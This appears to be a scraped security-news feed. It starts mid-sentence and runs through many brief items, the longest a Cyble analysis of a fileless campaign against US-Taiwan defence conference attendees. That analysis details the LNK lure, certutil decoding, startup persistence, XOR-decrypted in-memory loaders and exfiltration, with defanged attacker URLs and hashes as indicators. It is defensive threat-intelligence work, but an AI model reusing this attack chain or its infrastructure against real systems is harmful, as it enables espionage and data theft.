PDF is opened with the system’s default PDF viewer. The first-stage loader, ""updater.exe,"" is designed to run from the startup directory. It sends a POST request to a compromised site, revealing the victim''s machine information. The loader then retrieves additional content from a URL controlled by the attackers, including a base64-encoded and XOR-encrypted DLL file. This DLL file is dynamically loaded and executed in memory using .NET''s “Assembly.Load” function. The second-stage loader follows a similar process, downloading encrypted C# code, which is compiled and executed entirely in memory. This approach effectively evades detection by traditional security measures. Data Exfiltration and Network Communication Once the compiled code is executed, it initiates the exfiltration of sensitive data. The data is sent to the attacker''s server using web requests that mimic normal traffic, further complicating detection efforts. The ""WebClient"" object is employed to upload data in a format that resembles standard web form submissions, with the ""ContentType"" set to ""application/x-www-form-urlencoded"" and the ""UserAgent"" header altered to simulate a web browser. The attackers also leverage a compromised website to host and manage malicious content. This includes storing exfiltrated data and additional payloads on an exposed open directory. CKFinder, a PHP-based file management framework, is used to facilitate the upload and management of these files. The sophisticated nature of this fileless attack and its timing suggest that it is likely conducted by threat actors with geopolitical interests. Historically, Chinese threat actors have targeted Taiwan around significant political events, as evidenced by increased cyberattacks during Taiwan’s recent presidential election. While this pattern aligns with the current attack''s context, the specific threat actor behind this campaign has not been identified. No direct links have been established to known advanced persistent threat (APT) groups or other threat actors. Conclusion This fileless attack exemplifies a high level of sophistication in both its execution and evasion techniques. By disguising the initial payload as a legitimate conference registration document and employing advanced in-memory execution methods, the attackers can steal sensitive information without leaving traditional traces on the disk. The timing of the attack, coinciding with the US-Taiwan Defense Industry Conference, underscores its potential intent to target valuable defense-related information. As the campaign progresses, vigilance and advanced detection strategies will be crucial in defending against such stealthy fileless attacks.

by The Cyber Express

This reference guide explains key roles across the IT industry, helping current and aspiring IT professionals choose the right career path and understand their next steps.

by ITPro Today

Password management organisation Keeper Security has unveiled the addition of a passphrase generator to the Keeper platform for mobile. This new feature, now available on Android devices, is designed to help users create strong and unique credentials for their accounts, addressing the growing risks posed by sophisticated cyber threats. Passphrases on iOS will be available […] The post Keeper Security Expands Passphrase Generator Capability to Mobile Devices appeared first on IT Security Guru.

by IT Security Guru

International Cyber Expo is once again teaming up with CrisisCast, to deliver their renowned immersive demonstrator experience, alongside exhibitors at this year’s highly anticipated event. Held at Olympia London on the 24th and 25th of September 2024, the Expo will showcase cutting-edge solutions and thought leadership in cybersecurity. CrisisCast, known for simulating crisis environments to address emerging […] The post Real-Time Cyberattack Simulations Take Centre Stage at International Cyber Expo 2024 with CrisisCast appeared first on IT Security Guru.

by IT Security Guru

Following a summit with U.S. and European partners, the company is working to build additional resiliency features to prevent a repeat of the historic global IT outage linked to CrowdStrike.

by Cybersecurity Dive

A 17-year-old from England has been arrested by the NCA over the recent cyberattack on Transport for London. The post UK Teen Arrested Over Transport for London Hack appeared first on SecurityWeek.

by SecurityWeek

As AI/ML applications surge, companies must prioritize GPU cost monitoring and optimization strategies to prevent spiraling costs and inefficiencies.

by ITPro Today

Researchers uncovered an Android malware, dubbed Vo1d, that has already infected nearly 1.3 million Android devices in 197 countries. Doctor Web researchers uncovered a malware, tracked as Vo1d, that infected nearly 1.3 million Android-based TV boxes belonging to users in 197 countries. The malicious code acts as a backdoor and allows attackers to download and install […]

by Security Affairs

Doctor Web warns of the new Vo1d Android malware infecting roughly 1.3 million TV boxes running older OS versions. The post 1.3 Million Android TV Boxes Infected by Vo1d Malware appeared first on SecurityWeek.

by SecurityWeek

By focusing directly on skills instead of more subjective criteria, IT leaders can build highly capable teams. Here''s what you need to know to get started.

by ITPro Today

Aside from enabling the monitoring of hacking operations, Recorded Future''s threat intelligence platform has also been touted to facilitate the discovery of misconfigured and vulnerable systems, as well as at-risk third-party infrastructure.

by SC Media

Nearly $5 billion of the reported losses — which also stemmed from call center fraud, tech support scams, and government spoofing — were attributed to the U.S., with California, Texas, Florida, and New York having the highest damages across the country, a report from the FBI''s Internet Crime Complaint Center showed.

by SC Media

Details regarding the targets of the indictment were not provided but such a move comes as the Justice Department committed to bolster transparency about election-targeted foreign influence threats after being less open about Russian interference during the 2016 polls.

by SC Media

Infiltration of TfL''s internal systems on September 1 resulted in the exfiltration of some customers'' names and contact information, as well as refund data belonging to nearly 5,000 Oyster cardholders.

by SC Media

Rain Technology announced ATM Switchable Privacy, designed to protect consumers against visual hackers and snoopers at ATM terminals in financial institutions, retail stores, restaurants, airports, and other public settings. ATM stats and state of the market With more than three million ATMs around the world and a global ATM market size estimated to reach $28 billion by 2026, ATMs within retail and banking settings represent a significant risk point for merchants, retailers and banks as … More → The post Rain Technology protects consumers against visual hackers and snoopers at ATM terminals appeared first on Help Net Security.

by Help Net Security

Attacks with the novel Veaty and Spearal malware strains have been deployed by Iranian state-backed advanced persistent threat operation OilRig, also known as APT34, against Iraqi government agencies and organizations as part of a new cyberespionage campaign.

by SC Media

Threat actors part of the proxyjacking campaign exploited Selenium Grid servers'' ""goog:chromeOptions"" configuration to facilitate deployment of a base64-encoded Python script, which enabled the retrieval of an open-source GSocket reverse shell.

by SC Media

Atlassian''s 2024 State of IT Incident Management Report sees progress in some areas, including organizations becoming more proactive, though evergreen challenges remain.

by ITPro Today

GitLab has released security updates to resolve multiple vulnerabilities in GitLab CE/EE, including a critical-severity pipeline execution flaw. The post GitLab Updates Resolve Critical Pipeline Execution Vulnerability appeared first on SecurityWeek.

by SecurityWeek

Critical infrastructure operators must beware of Russian military hacking groups. Plus, cyber scammers are having a field day with crypto fraud. Meanwhile, AI and cloud vendors face stricter reporting regulations in the U.S. And get the latest on AI-model risk management and on cybersecurity understaffing!Dive into six things that are top of mind for the week ending September 13.1 - Critical infrastructure orgs targeted by Russia-backed hackersHere’s an important warning for critical infrastructure organizations in the U.S. and abroad: Nation-state hacking groups affiliated with Russia’s military are attacking critical infrastructure targets to conduct espionage, carry out sabotage and inflict reputational harm.That’s according to a joint advisory from the governments of the U.S. and nine other countries that details the groups’ tactics, techniques and procedures, lists indicators of compromise and offers mitigation recommendations.The groups are affiliated with the Russian armed forces’ Unit 29155, according to the advisory “Russian Military Cyber Actors Target US and Global Critical Infrastructure” published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA).These Unit 29155 groups have been operating since 2020. They’re currently focused on disrupting aid efforts to Ukraine, which they first attacked with the WhisperGate malware in early 2022.   They also target critical infrastructure organizations in North Atlantic Treaty Organization (NATO) countries. Their attacks include defacing websites, stealing and leaking data, and scanning infrastructure.To gain initial access, these hacking groups use VPNs to hide their actions and then target internet-facing systems’ weaknesses, including these vulnerabilities: CVE-2021-33044 CVE-2021-33045 CVE-2022-26134 CVE-2022-26138 CVE-2022-3236 Immediate steps that critical infrastructure organizations should take to protect themselves include:Make it a priority to routinely update systems and to remediate known vulnerabilities exploited in the wild.Segment networks.Adopt phishing-resistant multi-factor authentication for all externally-facing account services.To get more details, read:The CISA alertThe full advisory “Russian Military Cyber Actors Target US and Global Critical Infrastructure”To learn more about securing operational technology (OT) systems in critical infrastructure environments, check out these Tenable resources:“CISA Finding: 90% of Initial Access to Critical Infrastructure Is Gained Via Identity Compromise. What Can You Do About It?” (blog)“OT Security Master Class: Understanding the Key Principles, Challenges, and Solutions” (on-demand webinar)“Operational Technology (OT) Security: How to Reduce Cyber Risk When IT and OT Converge” (guide)“5 Key OT Security Use Cases For The DoD: Safeguarding OT Networks and Cyber-Physical Systems” (white paper)“Unlock Advanced IoT Visibility in your OT Environment Security” (on-demand webinar)2 - Cyber crooks double down on crypto scamsDecentralized. Distributed. Speedy. Ephemeral. Irreversible.These are some of the key characteristics of cryptocurrency transactions that make them irresistibly attractive to cybercriminals, as evidenced by a strong increase in both the number of crypto scams and total losses in 2023.These findings come from the “2023 IC3 Cryptocurrency Report,” released this week by the FBI’s Internet Crime Complaint Center (IC3). Specifically, the IC3 received almost 69,500 crypto-related complaints last year. Losses amounted to $5.6 billion, a 45% increase over 2022. (Source: “2023 IC3 Cryptocurrency Report” from the FBI’s Internet Crime Complaint Center, September 2024)Other report takeaways include:Most of the losses – 70% – came from investment scams.Crypto scams accounted for about 10% of all financial-fraud complaints, but they disproportionately generated almost 50% of total losses.While most of the complaints fielded by IC3 originated in the U.S., it received complaints from victims in 200-plus countries.The report unpacks multiple types of crypto investment-fraud schemes, detailing scammers’ tactics and offering detailed prevention tips.For more information about crypto fraud:“What To Know About Cryptocurrency and Scams” (U.S. Federal Trade Commission)“How To Recover Funds From Crypto and Bitcoin Scam” (Blockchain Council)“Cryptocurrency Scams: How to Spot, Report, and Avoid Them” (Investopedia)“Cryptocurrency scams: Common types and prevention” (TechTarget)VIDEOHow Americans Are Losing Their Life Savings To Crypto Fraud (CNBC)3 - Uncle Sam wants more info from AI and cloud vendorsThe AI regulatory landscape continues to expand. This week, developers of AI systems and providers of cloud services learned they may soon have to submit more detailed reports about their wares to the U.S. government.Specifically, the U.S. Department of Commerce has proposed new rules for mandatory and detailed reporting about AI models and cloud computing clusters, due to concerns about hackers abusing powerful AI and cloud systems.AI developers and cloud providers would have to submit information to the U.S. government about their development activities and about cybersecurity measures and testing.  “This proposed rule would help us keep pace with new developments in AI technology to bolster our national defense and safeguard our national security,” Secretary of Commerce Gina M. Raimondo said in a statement.To get more information about trends in AI security and regulation:“AI governance trends: How regulation, collaboration and skills demand are shaping the industry” (World Economic Forum)“Artificial Intelligence Index Report 2024: Policy and Governance” (Stanford University)“Legalweek 2024: Current US AI regulation means adopting a strategic – and communicative – approach” (Thomson Reuters)“AI regulation: What businesses need to know in 2024” (TechTarget)4 - New risk management framework for AI and ML modelsConcerned about the pitfalls faced by developers and users of AI and machine learning (ML) models? You might want to check out the Cloud Security Alliance’s paper “AI Model Risk Management Framework.”The 54-page document addresses common AI model risks, including:Data quality issuesFlawed model selection, tuning and designImplementation and operational mistakesThe CSA framework offers a “structured approach” to identify, assess, mitigate and monitor AI model risks. Its four pillars are:Model cards, which detail model elements such as its purpose, training, capabilities, resistance to attacks, limitations and performanceData sheets, which offer descriptions of the dataset used to create an AI modelRisk cards, which summarize an AI model’s key risksScenario planning, which outlines ways in which a model could malfunction or be abusedFramework Pillars for Responsible and Well-Informed Use of AI / ML(Source: Cloud Security Alliance’s “AI Model Risk Management Framework,” July 2024)“A comprehensive framework goes a long way to ensuring responsible development and enabling the safe and responsible use of beneficial AI/ML models, which in turn allows enterprises to keep pace with AI innovation,” Caleb Sima, Chair of the CSA AI Safety Initiative, said in a statement.The paper’s intended audience includes AI and ML engineers and developers; data scientists; risk managers; compliance pros; and business executives.According to the paper, the benefits of adopting a risk management framework for AI and ML models include more transparency, proactive risk mitigation and enhanced decision-making processes.5 - U.S. gov’t tackles cyber understaffing with new campaignIs your organization struggling to recruit cybersecurity pros? A new initiative from the U.S. government aims to connect potential candidates with employers.With about 500,000 cybersecurity jobs vacant in the U.S., the White House has launched a two-month “sprint” campaign designed to help recruit candidates to fill these positions.Called “Service for America,” the campaign kicked off in early September and runs through the end of October. Its goal: to boost the country’s cyber workforce via a variety of initiatives, such as job fairs.“These jobs offer an opportunity to serve our country by protecting our national security, while also offering a personal path to prosperity,” Nation Cyber Director Harry Coker, Jr. wrote in the blog post “Service for America: Cyber Is Serving Your Country.” “Service for America” will aim to create awareness that people don’t need a technical degree or background to qualify for cybersecurity jobs. “Cyber professionals are part of a dynamic and diverse modern workforce and individuals from all backgrounds and disciplines have a place,” Coker, Jr. wrote.  “Service for America” is part of the “National Cyber Workforce and Education Strategy,” unveiled in mid-2023, which seeks, among other things, to:Remove degree requirements from cybersecurity jobs, shifting instead to a skills-based approachExpand apprenticeships that allow people to gain cybersecurity skills while at their current jobsEncourage employers, academia, local governments and non-profit organizations to offer cybersecurity training and education in their local communitiesThe Office of the National Cyber Director is spearheading the “Service for America” campaign, in partnership with the Office of Management and Budget and the Office of Personnel Management.To get more details, check out:The “Service for America” home pageThe blog post “Service for America: Cyber Is Serving Your Country”This video from the National Cyber DirectorFor more information about how organizations can improve recruitment of cyber pros:“Recruitment and Retention in Cybersecurity” (ISC2)“Strategic Cybersecurity Talent Framework” (World Economic Forum)“Growing threats outpace cybersecurity workforce” (Thomson Reuters)“Why closing the cyber skills gap requires a collaborative approach” (World Economic Forum)“Cybersecurity skills gap: Why it exists and how to address it” (TechTarget)6 - Report: Almost 5M cyber jobs open globallyAnd continuing with the topic of cybersecurity understaffing, the problem isn’t getting any better globally either.There are 4.8 million vacant cybersecurity jobs worldwide, up 19% compared with 2023, with the primary causes being budget constraints and lack of qualified candidates, according to the “2024 ISC2 Cybersecurity Workforce Study.”The number of cyber pros employed globally – 5.5 million – stayed flat from last year. Meanwhile, the world needs 10.2 million cyber pros to satisfy the workforce demand.“At a time when organizations can least afford the cost, disruption and reputational damage of a cybersecurity incident, the profession is under its greatest pressure to maintain safety and security with fewer resources,” reads an ISC2 statement.ISC2 plans to publish the report in October, but released key stats this week.   Another number that stayed flat compared with 2023 was the percentage of respondents that reported having a shortage of cyber pros – 67%.In addition to understaffing, organizations are also experiencing skills gaps. Specifically, 90% reported having technical skills gaps in their cybersecurity teams, with AI / ML skills the most commonly reported at 34%. Rounding out the top five cybersecurity tech-skills gaps were:Cloud computing security (30%)Zero Trust implementation (27%)Digital forensics and incident response (25%)A tie between application security and penetration testing, both at 24%Meanwhile, 74% of respondents described the current threat landscape as the most challenging they’ve encountered in the last five yearsThe study is based on a worldwide survey of almost 16,000 cybersecurity practitioners and decision-makers.If you’d like to explore career opportunities at Tenable, visit us at https://www.tenable.com/careers

by Tenable

Key Takeaways Cyble Research and Intelligence Labs (CRIL) identified a campaign targeting individuals connected to the upcoming US-Taiwan Defense Industry Conference, as indicated by the lure document uncovered during the investigation. The campaign involves a ZIP archive containing an LNK file that mimics a legitimate PDF registration form for deception. When the LNK file is opened, it executes commands to drop a lure PDF and an executable in the startup folder, establishing persistence. Upon system reboot, the executable downloads additional content and executes it directly in memory, effectively evading detection by the security products. The first-stage loader triggers a second-stage loader, which downloads, decodes, and compiles C# code in memory, avoiding the creation of traceable files on disk. Once the compiled code is executed, the malware exfiltrates sensitive data back to the attacker''s server via web requests designed to blend in with normal traffic, making detection more difficult. Overview The initial infection vector of this campaign remains unclear; however, based on the lure document analyzed, there are indications that the attack may have been delivered to users via spam emails. The attack commences with a suspicious archive file containing an LNK file disguised as a PDF document. This deception is designed to trick users into executing the malicious LNK file, which in turn triggers a series of covert actions in the background. Upon execution, the LNK file extracts two components: a base64-encoded executable and the actual lure PDF. The executable is protected using .NET''s Confuser, an obfuscation tool, to evade detection and is placed in the startup folder to ensure persistence on the compromised system. Once the executable runs, it retrieves additional malicious content, specifically a DLL file, from a remote server. This DLL file is Encrypted using XOR operation to further obscure its purpose. The executable employs .NET''s “Assembly.Load” function to load the decrypted DLL directly into memory, enabling it to bypass traditional security mechanisms that scan files written to disk. After the DLL is loaded, it downloads encrypted C# code from the TA-controlled server, compiles it on the victim''s machine, and then executes it entirely in memory. During our testing of this malware, we were unable to capture the final payload. However, analysis of the loader’s code suggests that the payload''s ultimate purpose is to exfiltrate sensitive data from the victim''s machine to conduct further malicious activities. Based on the lure document used in this attack, it is likely that the TA behind this campaign is specifically targeting individuals associated with the upcoming US-Taiwan Defense Industry Conference. The figure below shows the infection chain. Figure 1 - Infection chain Technical Analysis CRIL uncovered a campaign targeting users by posing as registration forms for the upcoming Conference and distributed malicious ZIP files under the name ""registration_form.pdf.zip”. The ZIP file contains an LNK file disguised as a PDF. When extracted, the archive presents a file named ""registration_form.pdf,"" but this is actually an LNK file with a dual extension (.pdf.lnk), misleading the user into thinking it is a legitimate PDF document. The malicious LNK file contains an embedded executable and a lure PDF, both encoded in base64 format, further concealing the malicious content, as shown in Figure 2. When the user opens the LNK file, it triggers several background commands. First, the LNK file searches the base64 embedded content using the ""findstr"" command and saving them as ""1.txt"" and ""2.txt,"" respectively. Next, the ""certutil"" utility decodes these files, storing the lure PDF as "" registration_form.pdf "" in the Temp directory and the executable as ""update.exe"" in the ""%AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"" folder, ensuring persistence. Finally, the registration_form.pdf is opened with the system’s default PDF viewer. The figure below shows the content of the malicious LNK file. Figure 2 - Contents of registration_form.pdf.lnk Lure Document: The lure document used in this attack suggests that the TA behind the campaign is likely targeting individuals connected to the upcoming US-Taiwan Defense Industry Conference, which is scheduled to take place in the United States from September 22nd to September 24th, 2024. The potential targets are expected to include key participants such as defense officials, industry executives, government representatives, and other stakeholders involved in or attending the event. The timing and focus of the campaign suggest that the TA aims to exploit the significance of the conference, potentially for gathering sensitive information to conduct further malicious activities. This strategic targeting underscores the sophisticated nature of the campaign and its alignment with geopolitical interests. The figure below shows the Lure document. Figure 3 - Contents of the lure document First Stage Loader: updater.exe The ""Updater.exe"" file functions as a loader and is protected using the .NET ""Confuser protector."" It is placed in the Startup folder, ensuring it executes each time the user logs into the system. Upon execution, the file first verifies if it is running from the ""Startup"" directory. If it is, the execution proceeds; otherwise, it terminates without further action. When the file runs, it sends a POST request to a compromised site controlled by the TA, transmitting the victim''s machine. Next, using “WebClient”, it downloads string content from ""hxxp://tdea.com.tw/asset/uploads/files/68679813[.]txt"" and removes the first character to retrieve the correct base64-encoded content. This reveals the machine name: “MSEDGEWIN10"" URL for the 2nd stage loader: ""hxxp://tdea.com.tw/asset/uploads/files/68679815[.]txt"" The first-stage loader downloads a base64-encoded data stream from the above URL, which is first decoded and then further processed by applying an XOR operation using a hardcoded key with a decimal value of 16. This operation results in the extraction of a DLL file. The below shows the decryption loop used for getting the DLL file. Figure 4 – Decryption Loop The extracted DLL is then dynamically loaded and executed using the .NET “Assembly.Load” function, allowing the TA to invoke malicious functionality embedded within the DLL. The below figure shows how the “Assembly.Load” function is used to load the decrypted DLL and call a specific method named “MyEntry” with in a class named “ConsoleApp.MyClass” Figure 5 - 1st stage loader Second Stage Loader The “.NET Assembly.Load” function is used to load the second-stage loader, which functions similarly to the initial stage. This DLL loader retrieves additional base64-encoded content from the TA’s controlled server. Once the content is downloaded, it is decoded using base64 and then processed with an XOR operation using a hardcoded key of 48 in decimal, as shown below. Figure 6 - Decryption loop Although the URL ""hxxp://tdea.com.tw/asset/uploads/files/68679811[.]txt"" currently doesn''t contain any data, code analysis indicates that the decoded content is likely XML data containing C# code and assembly references (DLLs) which utilizes “Compile After Delivery” technique to compile the source code during runtime. Figure 7 - Code snippet downloading XML data In-memory Execution The downloaded C# code is compiled in memory using specific compiler parameters such as “GenerateExecutable = false” and “GenerateInMemory = true”. These parameters, along with references to core assemblies like “System.dll”, “System.Data.dll”, and “System.Management.dll”. The “System.Management.dll” is specifically used to interact with Windows Management Instrumentation (WMI), allowing the code to query system properties and interact with system components through WMI queries. This suggests that the TA may use WMI queries to gather system information from the victim.   Additional DLLs may also be included as reference assemblies. The compiled code is executed directly in memory, bypassing the disk entirely, which complicates detection by conventional security tools. This method is highly effective for evasion. It allows malware or APT groups to dynamically generate and execute payloads at runtime, making detection and mitigation efforts significantly more challenging for defenders. The figure below shows a code snippet responsible for compiling the downloaded C# code and executing it in memory. Figure 8 - Compiling the C# code and executing it in memory Data Exfiltration After executing the compiled code, the resulting data is sent back to the TA''s server using a web request. A “WebClient” object is utilized to upload the data, where the request''s “ContentType” is set to ""application/x-www-form-urlencoded"" to simulate standard form data submission, and the “UserAgent” header is modified to mimic a web browser. The “UploadString” method is used to send a POST request to the TA’s specified URL, along with parameters such as a randomly generated filename, a command flag, and the encoded content being transmitted. Figure 9 – UploadString method to POST data Network Communication: The TA leverages a compromised website to host malicious content and frequently retrieves files stored within an exposed open directory. Moreover, the TA employs CKFinder, a PHP-based file management framework, to upload and manage files sent from the victim machines. This framework allows the TA to store exfiltrated data or additional malicious payloads on the server. The image below illustrates the structure of the open directory on the compromised site, highlighting the ease with which the TA can access and manipulate stored files. Figure 10 - Open Directory Threat Attribution Chinese threat actors have a well-documented history of targeting Taiwan, particularly around significant political events. For instance, during the period leading up to Taiwan’s presidential election earlier in 2024, there was a marked increase in cyberattacks within the 24 hours preceding the election, as reported by Trellix. Despite this pattern, the specific TA behind the current campaign remains unidentified, and we have not been able to link these tactics, techniques, and procedures (TTPs) to any known threat actor or advanced persistent threat (APT) group at this time. Conclusion This sophisticated attack employs social engineering and advanced in-memory execution techniques to avoid detection. By disguising the LNK file as a legitimate conference registration PDF and executing payloads dynamically in memory, the TAs can conduct malicious activities to steal sensitive information without leaving traces on the disk. Given the timing and context of the US-Taiwan Defense Industry Conference, this campaign is likely intended to conduct malicious operations targeting valuable information related to defense collaborations. Our Recommendations Deploy advanced email filtering solutions to block phishing emails and suspicious attachments before they reach the end users. Anti-phishing solutions that use machine learning or behavior analysis can also identify and block malicious campaigns at an early stage. Implement security solutions with advanced threat detection that can monitor in-memory execution of code or PowerShell commands. Tools like EDR (Endpoint Detection and Response) should be used to detect unusual behavior, such as programs compiling and running C# code in memory. Ensure that users have the least privileges required for their roles, reducing the risk of malware being able to execute in privileged areas. Application whitelisting or blocking untrusted applications from executing in certain directories can also minimize the risk. Monitor outbound network traffic for signs of exfiltration and communication with command-and-control (C2) servers, especially encrypted and base64-encoded traffic. Use firewalls, IDS/IPS (Intrusion Detection and Prevention Systems), and network analysis tools to detect suspicious web traffic patterns. MITRE ATT&CK® Techniques Tactic Technique Procedure Initial Access (TA0001) Spearphishing Attachment (T1566.001) The ZIP archive containing the LNK file may be delivered via phishing or spam emails Persistence (TA0003) Registry Run Keys / Startup Folder (T1547.001) update.exe added into the Startup folder Execution (TA0002) User Execution: Malicious File  (T1204.002) Malicious LNK file executed by the user after extracted from archive file   Defence Evasion (TA0005) Obfuscated Files or Information: LNK Icon Smuggling (T1027.012) The LNK file uses a PDF file icon, leveraging the “IconEnviromentDataBlock” to appear as a harmless PDF document. Defence Evasion (TA0005) Deobfuscate/Decode Files or Information (T1140)   Certutil is used to decode base64 content. Defence Evasion (TA0005) Obfuscated Files or Information: Compile After Delivery (T1027.004) CSharp code is compiled and executed in memory Command and Control (TA0011) Data Encoding: Non-Standard Encoding (T1132.002)   Encrypted file is downloaded from TA controlled server. Exfiltration (TA0010) Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003)   Exfiltrated data is transmitted using standard protocol. Indicators of Compromise (IOCs) Indicator Indicator Type Comments 6b1af6be189e31168b8f4eff84cd475eb5d0cbd08e646760fb352165a30cb269 SHA-256 registration_form.pdf.zip 4989882339d745692eabe0a375d8cecd6e7e3af534cd1173d94867b8d069cd7f SHA-256 registration_form.pdf.lnk 0e07b96c508dfc0e11f119071cca4ec628dae635771532dae7f034ed369591d7 SHA-256 updater.exe df92e2c56f53c9139da70c5a813b6512df616abd56dc10dc80a625c4512cb7f2 SHA-256 updater.exe e0174968064b45d1b0c255bec351de94bb59852cb7f2e6ac694debbac59acb7a SHA-256 d.dll 5aaa5a7ef2eaa13e6e4274ccdb3c80251c868043fa51c2ca1e5b556a65d5166c               SHA-256 68679815.txt 531db819d928243bda43997165da1fa3ebda3412e7d9928cb6bd2a8c898a85ae                        SHA-256 68679813.txt hxxp://tdea.com.tw/asset/uploads/files/68679813[.]txt URL URL used to get the DLL link hxxp://tdea.com.tw/asset/uploads/files/68679815[.]txt URL URL used to get the DLL file hxxp://tdea[.]com[.]tw/ckeditor/ckfinder/core/connector/php/connector[.]php?command=SaveFile&type=Files&currentFolder=%2F&langCode=en&hash=f92a86fd96382c5a URL POST request to send exfiltrated data hxxp://tdea.com.tw/asset/uploads/files/68679811[.]txt URL URL used to get the CSharp (C#) code The post Stealthy Fileless Attack Targets Attendees of Upcoming US-Taiwan Defense Industry Event appeared first on Cyble.

by CYBLE

We’re focused on… The new UN convention on cybercrime. Why? Because the draft text of the UN Convention Against Cybercrime was finalised on 8 August 2024, and we asked Betania Allo (Founder and Principal Consultant, BA Cyber Law & Policy) to tell us more about it. On the blog this week, we’ve explored some of the details of the convention in a two part interview. First, we talked about the key strengths and weaknesses of the draft convention; and then we considered how this new convention aligns with existing agreements on cybersecurity. Here in the newsletter, though, it’s time to get more practical. What does the UN convention mean, in real terms, for cybersecurity practitioners and organisations in UN Member States? What does the convention mean for international collaboration in cybersecurity? “The convention introduces a new era of international cooperation in combating cybercrime,” said Allo. “By mandating the implementation of new laws and regulations in Member States, the convention aims to facilitate cross-border investigations and prosecutions. The success of this endeavour hinges on the willingness of nations to collaborate effectively and establish robust mechanisms to address jurisdictional disputes. “Practically, the convention is expected to bolster national cybercrime laws, deter cyberattacks and create a safer digital environment for businesses and individuals alike. The enhanced capacity to pursue cross-border cybercriminals will undoubtedly increase accountability and deter future offences. “For cybersecurity practitioners, the convention will expand the legal framework, driving demand for specialised expertise. Professionals will need to navigate a complex legal landscape while fostering international collaboration. “Businesses will face new obligations, including heightened cybersecurity investments, supply chain security measures, and robust data protection protocols. Balancing these requirements with the need for innovation will be a critical challenge. “ Which provisions of the UN Cybercrime Convention draft (A/AC.291/L.15) would be most beneficial for a diverse audience (including cybersecurity experts, business leaders, governance, risk, and compliance professionals, and government policymakers) to focus on and elaborate upon? “This topic resonates with a wide range of stakeholders, each with a vested interest in the protection against cybercrime. “For example, Article 28 outlines the procedures for the search and seizure of electronic data across borders. For cybersecurity experts, this provision is vital as it addresses the technical and legal challenges of accessing data stored in foreign jurisdictions. The clear guidelines provided in this article help ensure that such actions are carried out legally and efficiently, which is critical for timely incident response and mitigation. “For business leaders, the implications of this article are important, too. It highlights the need for robust data protection measures and a clear understanding of the legal obligations that may arise if their company’s data is subject to international seizure requests. Understanding this provision can help businesses better prepare for potential cross-border legal challenges related to data security. “A provision particularly relevant for GRC professionals is in the next Article, 29 – it deals with the real-time collection of traffic data; a crucial tool in tracking cybercriminal activities. The article emphasises the importance of lawful surveillance while balancing the need for privacy and civil liberties. “GRC professionals must understand this balance to develop compliance strategies that align with both the Convention’s requirements and their organisation’s ethical standards. “For government policymakers, moreover, Article 29 is a focal point for creating regulations that govern real-time data collection. Policymakers need to ensure that such regulations protect national security while also safeguarding individual privacy rights, a balance that is often challenging but essential. “Article 30, central to the interception of content data, is a critical tool in investigating serious cybercrimes such as terrorism and child exploitation. This provision is crucial for cybersecurity experts who are involved in the technical aspects of lawful interception. Understanding the legal framework governing these activities ensures that cybersecurity measures are both effective and compliant with international law. “For business leaders, ### the interception of content data raises important concerns about data privacy and the potential liabilities their companies might face. Being aware of these provisions helps businesses navigate the complex legal landscape surrounding data interception and develop strategies to protect their interests.” Read our full interview with Betania Allo on the BHMEA blog In Part 1, find out what sparked Betania’s interest in the UN Convention against Cybercrime, and discover her perspective on the convention’s strengths and weaknesses. In Part 2, find out how this new convention aligns with existing cybersecurity agreements, and how we can measure the success of the convention when Member States must develop their own local regulations. P.S. - Mark your calendars for the return of Black Hat MEA in November 2024. Want to be a part of the action? Register now!

by HACKLIDO

The breach marks yet another attack originating in a file-sharing or -transfer service, a common and highly damaging attack vector for opportunistic cybercriminals.

by Cybersecurity Dive

UK data centers are now critical assets, at power with electricity grids and water supply systems. In a landmark move, the UK government has classified data centers as Critical National Infrastructure (CNI) for the first time in nearly a decade. This designation, announced by Technology Secretary Peter Kyle on Thursday, aligns data centers with energy and water systems in terms of national importance. Statistically, UK houses more than 500 data centers. The latest change in government''s stance reflects growing recognition of the sector''s vital role in powering the digital economy and securing sensitive data. This new CNI status will provide data centers with enhanced government support during emergencies, including cyberattacks and adverse weather events. The designation ensures that the data held in these facilities—ranging from personal photos to critical NHS records—will be better protected and less susceptible to disruptions. ""CNI designation will, for example, see the setting up of a dedicated CNI data infrastructure team of senior government officials who will monitor and anticipate potential threats, provide prioritised access to security agencies including the National Cyber Security Centre, and coordinate access to emergency services should an incident occur."" Data Centers Engines of Digital World The move comes as the government also backs a significant investment in the sector. A proposed £3.75 billion development for Europe’s largest data center, planned by DC01UK in Hertfordshire, is set to create over 700 local jobs and support nearly 14,000 positions across the UK. Kyle said, ""Data centers are the engines of modern life, they power the digital economy and keep our most personal information safe. Bringing data centers into the Critical National Infrastructure regime will allow better coordination and cooperation with the government against cyber criminals and unexpected events. Under the new CNI status, data centers will benefit from a dedicated infrastructure team composed of senior government officials. This team will focus on monitoring and anticipating threats, ensuring prioritized access to security agencies such as the National Cyber Security Centre (NCSC), and coordinating emergency responses. These measures aim to mitigate the risk of data breaches and other disruptions that could impact essential services and public trust. This development also marks a shift in how the UK views digital infrastructure. The CNI designation shows the critical nature of data centers in safeguarding public and private sector information. It also aims to deter cybercriminals by enhancing security measures and providing more robust protection against attacks targeting vital health and financial data. Critical National Infrastructure Status will Heighten Trust In addition to improving security, the CNI status is expected to boost business confidence in investing in UK data centers. The sector, which already generates approximately £4.6 billion annually, will benefit from greater stability and support, potentially attracting more international investment and fostering economic growth. The announcement follows recent incidents that reflects the sector’s vulnerabilities. For instance, the CrowdStrike incident earlier this summer disrupted 60% of GP practices, affecting patients’ appointment details and health records. Such events have highlighted the need for enhanced protection and the critical role of data centers in maintaining service continuity. Equinix UK Managing Director Bruce Owen welcomed the decision, emphasizing the integral role of digital infrastructure in modern life. The internet, and the digital infrastructure that underpins it, has rapidly grown to be as fundamental to each one of our daily lives as water, gas, and electricity,"" Owen said. ""We are pleased to see the government recognize this and take steps to safeguard the industry."" Matthew Evans, Director of Markets and COO at techUK, also supported the move. ""Data centers are fundamental to our digitizing economy and are a key driver of growth,"" Evans said. ""We look forward to collaborating closely with the government to ensure the successful implementation of these new measures."" The introduction of Critical National Infrastructure status for data centers reflects a broader strategy to enhance the UK''s cyber resilience and support technological advancements. With the introduction of the Cyber Security and Resilience Bill and other initiatives, the government aims to strengthen the country’s defenses against cyber threats and bolster economic growth through increased investment in digital infrastructure. As the UK continues to position itself as a leader in data security and digital innovation, the new CNI designation for data centers represents a significant step in ensuring the stability and resilience of its critical infrastructure.

by The Cyber Express

